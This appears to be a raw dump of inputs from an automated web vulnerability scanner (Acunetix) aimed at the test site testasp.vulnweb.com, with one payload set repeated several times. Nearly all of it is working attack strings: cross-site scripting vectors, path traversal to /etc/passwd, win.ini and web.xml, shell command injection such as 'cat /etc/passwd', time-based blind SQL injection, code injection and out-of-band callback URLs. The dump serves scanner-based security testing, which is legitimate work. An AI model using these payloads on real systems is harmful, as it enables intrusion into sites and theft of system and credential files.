http://testasp.vulnweb.com/t/fit.txt?%00.jpg

\xf6<img acu onmouseover=prompt(920802) //\xf6>

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

'"()

AY8Py0UJ'

1

testasp.vulnweb.com

1<input autofocus onfocus=prompt(920873)>

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

^(#$!@#$)(()))******

1

<a href='http://www.acunetix.com'>website security</a>

1

Z6EmHihr')

1

'

1

/etc/passwd

1

"

1

[url=http://www.acunetix.com]website security[/url]

1

1

"

jvXRI4Me'))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

||cat /etc/passwd

1_xEcdx <ScRiPt >prompt(913737)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

-1

1

${@print(md5(acunetix_wvs_security_test))}

1

&dir

1

1

http://hitg4ygPnfKyQ.bxss.me/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

-1)

1

1

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

-1))

1

1

"&dir&"

1

1

1

|dir

comments

http://www.acunetix.tst

'"

5Afogp7C'

1'"()&%<ScRiPt >prompt(944952)</ScRiPt>

1

comments/.

'|dir

file:///etc/passwd

JsDa4gYo')

<!--

1

'"()&%<ScRiPt >prompt(966603)</ScRiPt>

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

tDV1kfq1'))

"|dir

1

1

1_959638

1

1

WEB-INF/web.xml

1

1

1

1

WEB-INF\web.xml

1

1

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini

acu10205\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10205

1

../../../../../../../../../../boot.ini

1

acux9829\xc0\xbez1\xc0\xbcz2a\x90bcxuca9829

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(999645)</ScRiPt>

1

1

1

1<script>prompt(939903)</script>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

................windowswin.ini

1

1<ScRiPt >prompt(921680)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?994921></ScRiPt>

1

1

1

1<ScRiPt >prompt(981304)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<video><source onerror="javascript:prompt(911901)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(920401)"></g></svg>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<div style=width:expression(prompt(924290))>

response.write(9306853*9579901)

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<iframe src='data:text/html

'+response.write(9306853*9579901)+'

&cat /etc/passwd&

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(937985)>

'&cat /etc/passwd&'

"+response.write(9306853*9579901)+"

1

WEB-INF/web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(921874)>

"&cat /etc/passwd&"

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<img src=xyz OnErRor=prompt(944805)>

1

cat /etc/passwd

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1<img/src=">" onerror=alert(920226)>

1

1

../../../../../../../../../../etc/passwd.jpg

1

${100279+100062}

`cat /etc/passwd`

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<ScRiPt%20>prompt(906342)</sCripT>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

1

1

1&n932847=v902225

1&lt

)

|cat /etc/passwd#

1some_inexistent_file_with_long_name%00.jpg

1

!(()&&!|*|*|

-1)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

\xf6<img acu onmouseover=prompt(941111) //\xf6>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

testasp.vulnweb.com

^(#$!@#$)(()))******

'"()

-1))

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1<input autofocus onfocus=prompt(915611)>

1

1

1

0A8AxoNV'

"|"ld

1

1

<a href='http://www.acunetix.com'>website security</a>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

1

1

1

QedpXRk8')

[url=http://www.acunetix.com]website security[/url]

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

/etc/passwd

1

1

1

1

M5bAMEUz'))

1

1_rR0Tk <ScRiPt >prompt(937860)</ScRiPt>

'

${@print(md5(acunetix_wvs_security_test))}

1

http://hit7DlhKwYwmu.bxss.me/

1

1

acunetix_wvs_invalid_filename

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

"

${@print(md5(acunetix_wvs_security_test))}\

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1)

http://www.acunetix.tst

comments

1

1

1

'"

||cat /etc/passwd

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1))

comments/.

1

1'"()&%<ScRiPt >prompt(924130)</ScRiPt>

1

<!--

&dir

mUDfoEnq'

1

1

'"()&%<ScRiPt >prompt(940588)</ScRiPt>

1

1

1

'&dir&'

b7vEl5B3')

file:///etc/passwd

1

1_951071

1

1

1

"&dir&"

TzA5NvyR'))

/\../\../\../\../\../\../\../etc/passwd

1

1

1

acu8045\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8045

|dir

1

WEB-INF/web.xml

1

1

1

acux7353\xc0\xbez1\xc0\xbcz2a\x90bcxuca7353

'|dir

1<ScRiPt >prompt(920257)</ScRiPt>

1

1

WEB-INF\web.xml

"|dir

1<script>prompt(963694)</script>

1

../../../../../../../../../../windows/win.ini

1<ScRiPt >prompt(939822)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?954745></ScRiPt>

../../../../../../../../../../boot.ini

1

1

1<ScRiPt >prompt(979446)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1<video><source onerror="javascript:prompt(922765)">

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(947703)"></g></svg>

1

response.write(9815068*9299474)

................windowswin.ini

1

1

1<div style=width:expression(prompt(937566))>

1

..\..\..\..\..\..\..\..\windows\win.ini

'+response.write(9815068*9299474)+'

1

1

1<iframe src='data:text/html

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

"+response.write(9815068*9299474)+"

1

&cat /etc/passwd&

1

1

1

1<body onload=prompt(975943)>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(934229)>

1

"&cat /etc/passwd&"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

../../../../../../../../../../etc/passwd

1

1

1<img src=xyz OnErRor=prompt(969090)>

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

${100360+99003}

1

1<img/src=">" onerror=alert(924543)>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

`cat /etc/passwd`

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF/web.xml

1

1

1

1

-1

1<ScRiPt%20>prompt(962767)</sCripT>

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

WEB-INF\web.xml

1

../../../../../../../../../../etc/passwd.jpg

-1)

1

)

1&lt

1some_inexistent_file_with_long_name%00.jpg

1&n946057=v988936

'|'ld

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1))

1

!(()&&!|*|*|

\xf6<img acu onmouseover=prompt(960934) //\xf6>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

'"()

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"|"ld

iC4z0WK7'

1<input autofocus onfocus=prompt(901785)>

^(#$!@#$)(()))******

testasp.vulnweb.com

1

1

<a href='http://www.acunetix.com'>website security</a>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

KsdfoVLE')

1

1

1

1

'

1

[url=http://www.acunetix.com]website security[/url]

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

YtIzfiab'))

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

"

"

1

1_h8EUd <ScRiPt >prompt(920043)</ScRiPt>

/etc/passwd

-1

1

${@print(md5(acunetix_wvs_security_test))}

1

1

||cat /etc/passwd

1

1

1

&dir

-1)

${@print(md5(acunetix_wvs_security_test))}\

1

1

http://hitjXaL2x70ia.bxss.me/

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

'&dir&'

-1))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

acunetix_wvs_invalid_filename

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

4dHS0Ou9'

1

comments

"&dir&"

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

GC4Qbk9P')

'"

1'"()&%<ScRiPt >prompt(923983)</ScRiPt>

http://www.acunetix.tst

comments

1

|dir

<!--

DADlX8Zz'))

comments/.

1

'"()&%<ScRiPt >prompt(942563)</ScRiPt>

1

1

file:///etc/passwd

1

'|dir

1

1

1

1_925122

1

/\../\../\../\../\../\../\../etc/passwd

1

1

"|dir

1

1

WEB-INF/web.xml

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

acu1294\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1294

1

1

1

acux9685\xc0\xbez1\xc0\xbcz2a\x90bcxuca9685

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(953845)</ScRiPt>

1

1

1<script>prompt(980521)</script>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(973714)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?979749></ScRiPt>

1

1

................windowswin.ini

1<ScRiPt >prompt(965224)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<video><source onerror="javascript:prompt(909479)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(921830)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1

1<div style=width:expression(prompt(983624))>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

response.write(9947187*9646414)

1<iframe src='data:text/html

1

1

1

1

'+response.write(9947187*9646414)+'

1<body onload=prompt(980527)>

&cat /etc/passwd&

1

1

"+response.write(9947187*9646414)+"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(939238)>

1

WEB-INF/web.xml

1

'&cat /etc/passwd&'

1

1<img src=xyz OnErRor=prompt(975862)>

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

WEB-INF\web.xml

"&cat /etc/passwd&"

1

1<img/src=">" onerror=alert(981698)>

1

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1<ScRiPt%20>prompt(936300)</sCripT>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

cat /etc/passwd

1

1

1

1

1&lt

-1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

`cat /etc/passwd`

1

${99624+100383}

1

\xf6<img acu onmouseover=prompt(985474) //\xf6>

-1)

1

1

1

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

|cat /etc/passwd#

1<input autofocus onfocus=prompt(913397)>

-1))

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1&n983903=v933420

<a href='http://www.acunetix.com'>website security</a>

HzUY4IOA'

1some_inexistent_file_with_long_name%00.jpg

1

1

'|'ld

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

DaDjmy5I')

[url=http://www.acunetix.com]website security[/url]

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

1

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

AG8gW5nm'))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1_3q61c <ScRiPt >prompt(998560)</ScRiPt>

!(()&&!|*|*|

testasp.vulnweb.com

1

1

1

'

-1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

^(#$!@#$)(()))******

1

1

-1)

"

'

1

1

/etc/passwd

1

http://hit3VU8Q266CS.bxss.me/

1

1

-1))

${@print(md5(acunetix_wvs_security_test))}

1

"

acunetix_wvs_invalid_filename

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

UF9wb9yW'

1

${@print(md5(acunetix_wvs_security_test))}\

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

||cat /etc/passwd

comments

1

1

f51YdJ2W')

1

1

http://www.acunetix.tst

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

&dir

1

1

1'"()&%<ScRiPt >prompt(997995)</ScRiPt>

'"

3bA3xXeq'))

comments/.

'&dir&'

1

1

'"()&%<ScRiPt >prompt(968023)</ScRiPt>

<!--

1

1

"&dir&"

file:///etc/passwd

1

1_961841

1

1

1

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

|dir

1

'|dir

1

1

WEB-INF/web.xml

acu7578\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7578

"|dir

1

1

1

1

WEB-INF\web.xml

acux4651\xc0\xbez1\xc0\xbcz2a\x90bcxuca4651

1

1

1

1

../../../../../../../../../../windows/win.ini

1<ScRiPt >prompt(999218)</ScRiPt>

1

1

../../../../../../../../../../boot.ini

1<script>prompt(973256)</script>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(960748)</ScRiPt>

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?951866></ScRiPt>

1

1

1

1<ScRiPt >prompt(973676)</ScRiPt>

1

................windowswin.ini

1

1

1<video><source onerror="javascript:prompt(960604)">

..\..\..\..\..\..\..\..\windows\win.ini

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(951394)"></g></svg>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<div style=width:expression(prompt(935476))>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

response.write(9563990*9761849)

1

1<iframe src='data:text/html

1

'+response.write(9563990*9761849)+'

1

&cat /etc/passwd&

1<body onload=prompt(939559)>

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

"+response.write(9563990*9761849)+"

'&cat /etc/passwd&'

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(941004)>

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

WEB-INF\web.xml

1

1

1<img src=xyz OnErRor=prompt(921394)>

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img/src=">" onerror=alert(925118)>

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

1<ScRiPt%20>prompt(936483)</sCripT>

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

1

1

1

1&lt

1

'|'ld

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

1

1

\xf6<img acu onmouseover=prompt(971277) //\xf6>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${100134+99878}

1

1some_inexistent_file_with_long_name%00.jpg

"|"ld

1

)

1&n998772=v922464

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<input autofocus onfocus=prompt(957695)>

1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

x7rWarov'

1

<a href='http://www.acunetix.com'>website security</a>

'

1

testasp.vulnweb.com

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

r7av0uXX')

/etc/passwd

[url=http://www.acunetix.com]website security[/url]

'

'"()

1

"

1

1

1

JSa0zO8Y'))

1_11KxO <ScRiPt >prompt(913786)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

"

||cat /etc/passwd

1

1

1

1

1

-1

1

1

${@print(md5(acunetix_wvs_security_test))}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

&dir

1

1

acunetix_wvs_invalid_filename

http://hitNfU9aoQKid.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

1

'&dir&'

1

-1)

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

1

"&dir&"

-1))

1

1

1

http://www.acunetix.tst

comments

1

nkSyCclL'

'"

|dir

1'"()&%<ScRiPt >prompt(959278)</ScRiPt>

file:///etc/passwd

comments/.

JN8nkyrj')

1

<!--

1

1

'"()&%<ScRiPt >prompt(954717)</ScRiPt>

ucfJpBLc'))

1

'|dir

/\../\../\../\../\../\../\../etc/passwd

1

"|dir

1

1_952479

1

1

1

1

1

1

WEB-INF/web.xml

1

1

1

1

WEB-INF\web.xml

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini

acu5525\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5525

1

../../../../../../../../../../boot.ini

1

1

acux2373\xc0\xbez1\xc0\xbcz2a\x90bcxuca2373

1

1

1<ScRiPt >prompt(961665)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<script>prompt(912722)</script>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(929531)</ScRiPt>

1

1

1

1

................windowswin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?986081></ScRiPt>

1

1

1

1<ScRiPt >prompt(966959)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<video><source onerror="javascript:prompt(921136)">

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(928645)"></g></svg>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9839862*9746275)

1<div style=width:expression(prompt(917699))>

1

1

'+response.write(9839862*9746275)+'

1<iframe src='data:text/html

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

&cat /etc/passwd&

"+response.write(9839862*9746275)+"

1<body onload=prompt(950301)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

1

WEB-INF/web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(980101)>

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=xyz OnErRor=prompt(919035)>

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF\web.xml

1

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1<img/src=">" onerror=alert(939004)>

1

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

1

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

${99007+100041}

1<ScRiPt%20>prompt(918311)</sCripT>

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1

1

1

-1

1&lt

1

1

1&n974557=v988998

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

\xf6<img acu onmouseover=prompt(997386) //\xf6>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1))

1

'|'ld

1some_inexistent_file_with_long_name%00.jpg

!(()&&!|*|*|

1<input autofocus onfocus=prompt(900562)>

1

'"()

"|"ld

At8I1tSF'

^(#$!@#$)(()))******

<a href='http://www.acunetix.com'>website security</a>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

http://testasp.vulnweb.com/t/xss.html?%00.jpg

[url=http://www.acunetix.com]website security[/url]

1

JyMea1c9')

1

1

"

/etc/passwd

testasp.vulnweb.com

1

kQkBJwBB'))

1_ZUBBZ <ScRiPt >prompt(903714)</ScRiPt>

1

${@print(md5(acunetix_wvs_security_test))}

1

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

-1

1

http://hitD9JJOjZSN4.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}\

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

acunetix_wvs_invalid_filename

-1)

1

1

1

1

||cat /etc/passwd

comments

-1))

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

1

&dir

comments

4g1XQdAg'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

'"

1

'&dir&'

comments/.

o1eSKZCi')

1'"()&%<ScRiPt >prompt(962047)</ScRiPt>

1

1

file:///etc/passwd

1

<!--

1

xyBl7Oer'))

1

'"()&%<ScRiPt >prompt(936632)</ScRiPt>

"&dir&"

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1

WEB-INF/web.xml

1

1_969672

1

1

|dir

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1

'|dir

1

../../../../../../../../../../boot.ini

acu10561\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10561

1

1

../../../../../../../../../../windows/win.ini.jpg

"|dir

acux10032\xc0\xbez1\xc0\xbcz2a\x90bcxuca10032

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(929483)</ScRiPt>

1

1

1

................windowswin.ini

1<script>prompt(931622)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(999888)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?987767></ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt >prompt(923615)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9405057*9029688)

1

1<video><source onerror="javascript:prompt(903435)">

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'+response.write(9405057*9029688)+'

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(950644)"></g></svg>

1

1

1

"+response.write(9405057*9029688)+"

&cat /etc/passwd&

1<div style=width:expression(prompt(991799))>

1

1

1

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

1<iframe src='data:text/html

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

WEB-INF\web.xml

../../../../../../../../../../etc/passwd

1<body onload=prompt(900203)>

1

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(913053)>

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

cat /etc/passwd

1

1<img src=xyz OnErRor=prompt(957780)>

1

1

1<img/src=">" onerror=alert(998911)>

1

1

`cat /etc/passwd`

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

1<ScRiPt%20>prompt(982086)</sCripT>

1

1

1

${100024+99933}

1

-1

|cat /etc/passwd#

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

